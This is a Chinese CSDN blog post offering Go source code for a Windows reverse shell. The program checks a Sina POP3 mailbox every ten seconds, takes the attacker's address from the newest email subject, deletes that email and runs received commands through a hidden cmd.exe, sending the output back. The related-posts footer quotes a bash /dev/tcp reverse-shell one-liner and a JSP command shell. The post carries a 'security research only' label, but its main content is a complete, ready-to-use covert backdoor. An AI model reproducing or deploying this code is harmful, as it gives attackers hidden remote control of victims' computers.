golang写的反弹shell(自作孽不可活,切记,切记!)

最新推荐文章于 2024-06-13 09:55:49 发布
最新推荐文章于 2024-06-13 09:55:49 发布
阅读量7.8w 收藏 4
点赞数 1
分类专栏: 黑客帝国 编程人生 文章标签: golang
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jailman/article/details/78321872
版权

仅作安全研究

package main
import (
    "os/exec"
    "go-pop3"
    "log"
    "strings"
    "net"
    // "fmt"
    "syscall"
    "bufio"
    "time"
)

//反弹shell函数
func reverseshell(addr string){

    if c,_:=net.Dial("tcp", addr); c != nil {
        for{
            status, _ := bufio.NewReader(c).ReadString('\n');
            //显示输入命令
            // fmt.Println(status)
            //输入exit命令退出
            if status == "exit\n" {
                break
            }
            //输入Ctrl+C时字符为空退出
            if status == "" {
                break
            }
            //执行命令返回结果
            cmd := exec.Command("cmd", "/C", status)
            cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
            out, _ := cmd.Output();
            c.Write([]byte(out))
        }
    }
}

//获取Email中的地址并调用反弹shell函数
func Get_Address_to_Rverse_shell(username string, password string){

    client, err := pop3.Dial("pop.sina.com:110")

    if err != nil {
        log.Fatalf("Error: %v\n", err)
    }

    defer func() {
        client.Quit()
        client.Close()
    }()

    if err = client.User(username); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Pass(password); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    var count int
    var size uint64

    if count, size, err = client.Stat(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    log.Printf("Count: %d, Size: %d\n", count, size)

    var content string

    if content, err = client.Retr(count); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Dele(count); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Noop(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    if err = client.Rset(); err != nil {
        log.Printf("Error: %v\n", err)
        return
    }

    //处理邮件object,获取地址
    list := strings.Split(content, "\r\n")
    for i := 0; i < len(list); i++ {
        line := list[i]
        if strings.Contains(line, "Subject:"){
            addrlist := strings.Split(line, ":")
            if len(addrlist) == 3 {
                temp_addr := addrlist[1] + ":" + addrlist[2]
                ADDR := strings.Replace(temp_addr, " ", "", -1)
                reverseshell(ADDR)
                // go reverseshell(ADDR)
            }
        }
    }
}


func main(){
    
    username := "xxx"
    password := "xxx"
    for{
        Get_Address_to_Rverse_shell(username, password)
        time.Sleep(10 * time.Second)
    }

}



大囚长
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
go反弹shell
x10n9的博客
03-09 284
go反弹shell
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
发掘强大防御之道:深度剖析 Go 语言实现的 DDoS 教育工具
最新发布
gitblog_00056的博客
06-13 330
发掘强大防御之道:深度剖析 Go 语言实现的 DDoS 教育工具 项目地址:https://gitcode.com/Konstantin8105/DDoS 在互联网的广袤世界中,安全是一场永不停息的博弈。其中,分布式拒绝服务(DDoS)攻击为网络空间的一股暗流,时常威胁着网站与服务的稳定性。今天,我们向您推荐一个独特的开源项目——一个用于教育目的的 DDoS 模拟工具,它由 Golang,...
go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒
11-03
go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒 此版本为后续改进debug版本,windows下可以编译去掉显示窗口 添加linux版本
mysql 反弹shell_golang反弹shell脚本
weixin_31293685的博客
01-27 216
一、Golang语言package mainimport ("fmt""net""strings""io/ioutil""log""os/exec")func cmd_connect(c net.Conn) {if c == nil {return}buf := make([]byte, 4096)for {cnt, err := c.Read(buf)if err != nil || cnt =...
GoAhead 远程命令执行漏洞(CVE-2017-17562)反弹shell
Aesthetic99的博客
03-22 6150
GoAhead 远程命令执行漏洞(CVE-2017-17562)反弹shell GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序,这个漏洞就出现在运行CGI程序的时候。 GoAhead在接收到请求后,将会从URL参数中取出键和值注册进CGI程序的环境变量,且只过滤了REMOTE_HOST和HTTP_AUTHORIZATION。我们能够控制环境变量,就有很多攻击方式。比如在
渗透测试中的 Go 语言使用:编反弹后门 Hershell
a13161333486的博客
05-07 2712
  介绍  在渗透测试过程中,一个必备的工具是众所周知的、超级棒的Metasploit框架。  该环境包含大量的payload、编码器和其他工具。在这些payload中Meterpreter有重要意义:它是一个经过开发和后开发命令的修改版的shell。由于其强大的攻击特性,该shell可能是最常用到的。  Meterpreter的问题  不幸的是,Meterpreter的流行有一个缺点:大多数反病...
Linux系统golang环境配置shell脚本
02-14
运行shell脚本,能够自动配置Linux系统golang环境,免去繁琐的手动配置步骤,也能在手机Termux上面安装golang环境。
循环鼠标自动点击功能- Golang实现
04-10
`mouse.exe`文件是编译后的可执行程序,它是`mouse.go`源代码经过编译后的产物,可以在Windows环境下运行,执行上述的鼠标自动点击功能。在Windows上,Golang编译的程序可以直接运行,无需安装额外环境。 总的来说...
Golang反向/绑定Shell生成器-Golang开发
05-26
Golang反向/绑定shell生成器GoSH Golang反向/绑定shell生成器说明此工具生成Go二进制文件,该二进制文件在目标主机上启动所需类型的shellShell二进制文件可以针对多个平台进行编译,支持部分多态性(唯一函数的...
Go的不可变集合-Golang开发
05-26
不可变此存储库包含Go的不可变集合类型。 它包括List,Map和SortedMap实现。 通过要求对Immutable进行编辑,不可变集合可以提供高效,无锁的数据共享。此存储库包含Go的不可变集合类型。 它包括List,Map和SortedMap...
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
CVE-2017-17562 GoAhea远程代码执行反弹shell姿势
Banyan的博客
12-21 3055
一丶漏洞影响GoAhea在shodan在搜索出的数量:GoAhea在全球的分布情况:二丶漏洞复现原输出Hello: World!文章:https://www.elttam.com.au/blog/goahead/ POC:https://www.exploit-db.com/exploits/43360/ 攻击机 windows10 IP:192.168.200.1 靶机 kali IP:192.
反弹Shell总结
code_lab
09-05 767
jsp shell<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("shell"); //获取参数 Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStre
反弹shell的命令大全
G3et的博客
03-21 869
【代码】反弹shell的命令大全。
ARM之反弹shell
github_38641765的博客
12-22 763
C代码 获取一个socket的文件描述符 定义好远程地址,使用connect函数连接过去 重定位标准输入流、标准输出流、标准错误流到socket文件描述符中去,这样就可以利用执行/bin/sh后,获取命令、输出结果的通道都有socket来执行,也就是远端操控 #include &lt;sys/types.h&gt; #include &lt;sys/s...
多种姿势反弹shell
Brucetg的博客
08-20 7099
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i &amp;gt;&amp;amp; /dev/tcp/x.x.x.x/port 0&amp;gt;&amp;amp;1 简单解释下: bash ...
golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本(CVE202017530)...
weixin_30696613的博客
12-26 464
声明由于传播、利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,博鸿科技安全服务中心以及文章者不为此承担任何责任。博鸿科技安全服务中心拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经博鸿科技安全服务中心允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。0x00 软件介绍strut...
revshell 一款非常好用的生成反弹Shell命令的工具
ak.Gh0st的博客
08-09 805
revshell是一个由Go语言编反弹Shell工具,它是Reverse Shell Generator的命令行版本,旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Shell代码。目前支持的类型:除了支持多种Shell类型外,revshell还可以运行在多个操系统平台上,包括Mac、Linux和Windows。这使得用户可以在不同的环境中使用revshell来生成适用于目标主机操系统的反弹Shell代码,提高了工具的灵性和适用性。
golang shell 交互
09-07
### 回答1: 你可以使用 `os/exec` 包来在 Go 中实现与 Shell 的交互。下面是一个简单的示例代码: ```go package main import ( "bufio" "fmt" "os/exec" ) func main() { cmd := exec.Command("sh") stdin, err := cmd.StdinPipe() if err != nil { panic(err) } stdout, err := cmd.StdoutPipe() if err != nil { panic(err) } scanner := bufio.NewScanner(stdout) if err := cmd.Start(); err != nil { panic(err) } go func() { defer stdin.Close() stdin.Write([]byte("echo hello world\n")) }() for scanner.Scan() { fmt.Println(scanner.Text()) } if err := cmd.Wait(); err != nil { panic(err) } } ``` 这个例子创建了一个 `sh` 进程,并通过管道向其输入了一个命令 `echo hello world`,然后读取了输出并打印到控制台。你可以根据自己的需求修改这个例子。 ### 回答2: golangShell交互是指在Golang程序中执行Shell命令并与其进行交互的功能。 在Golang中实现Shell交互可以使用os/exec包。该包提供了执行Shell命令的函数和方法,可以通过它们来执行Shell命令并获取命令的标准输出、标准错误和执行结果。 首先,我们需要引入os/exec包。然后,使用exec.Command函数创建一个Cmd类型的对象,该对象表示要执行的Shell命令。可以通过Cmd对象的方法设置命令的参数、工目录等。 接下来,使用Cmd对象的CombinedOutput方法来执行Shell命令,并获取命令的输出结果。CombinedOutput方法会返回一个字节数组,其中存储了命令的标准输出和标准错误。 最后,我们可以将字节数组转换为字符串,并进行相应的处理,如打印输出或进一步解析。 以下是一个简单的示例代码,演示了如何在Golang中实现Shell交互的功能: ``` package main import ( "fmt" "log" "os/exec" ) func main() { cmd := exec.Command("ls", "-l") // 创建Cmd对象,执行ls -l命令 output, err := cmd.CombinedOutput() // 执行命令并获取输出结果 if err != nil { log.Fatal(err) // 如果执行命令出错,打印错误信息并退出 } fmt.Println(string(output)) // 将字节数组转换为字符串并打印输出 } ``` 以上代码会执行`ls -l`命令,并将结果打印到控制台。 需要注意的是,在使用Golang执行Shell命令时,需要保证可执行的命令位于环境变量`$PATH`所指定的路径中,否则需要指定完整的命令路径。示例中的`ls`命令是一个常见的Shell命令,因此不需要指定路径。 总结来说,通过使用os/exec包,我们可以在Golang程序中实现Shell交互的功能,从而执行Shell命令,并获取其输出结果。 ### 回答3: Go语言本身并不提供直接的Shell交互功能,但我们可以使用一些第三方库来实现类似的功能。 一个常用的库是“os/exec”,它允许我们执行外部 Shell 命令并与其进行交互。下面是一个简单的示例代码: ```go package main import ( "bufio" "fmt" "os" "os/exec" ) func main() { // 创建一个命令对象 cmd := exec.Command("/bin/sh") // 获取命令的标准输入和输出管道 stdin, _ := cmd.StdinPipe() stdout, _ := cmd.StdoutPipe() // 启动命令 cmd.Start() // 准备一个输入读取器,用于读取用户输入 reader := bufio.NewReader(os.Stdin) for { // 读取用户输入 input, _ := reader.ReadString('\n') // 将用户输入入命令的标准输入管道 stdin.Write([]byte(input)) // 读取命令的标准输出 output := make([]byte, 1024) stdout.Read(output) // 打印输出结果 fmt.Println(string(output)) } } ``` 这段代码会启动一个新的Shell,并不断读取用户的输入并将其发送给Shell的标准输入,然后读取Shell的标准输出并打印出来。 请注意,这里的示例代码没有处理错误情况,为了简单起见,省略了错误处理部分。在实际应用中,我们应该对错误进行适当处理。 希望这个示例能够帮助你实现Go语言下的Shell交互功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值